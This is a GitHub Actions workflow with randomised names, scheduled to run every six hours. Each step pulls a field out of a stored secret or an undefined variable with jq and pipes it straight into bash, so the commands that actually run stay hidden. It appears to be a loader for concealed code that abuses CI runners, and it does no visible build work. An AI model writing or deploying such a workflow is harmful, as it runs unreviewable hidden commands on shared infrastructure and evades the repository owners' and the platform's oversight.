name: gongwanqiang7561

on:
  workflow_dispatch:
  schedule:
    - cron: '42 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gongwanqiang7561
        env:
          iutub108: ${{ secrets.iutub108 }}
        run: |
          echo $iutub108 | jq -r .du8 | /bin/bash
          echo $hw5 | jq -r .abe79 | /bin/bash
          echo $tnj9 | jq -r .gcsn37829 | /bin/bash
          echo $lyun0 | jq -r .at994 | /bin/bash
          echo $pmw5 | jq -r .kpr30615 | /bin/bash
          echo $plvgz6 | jq -r .gb7141 | /bin/bash

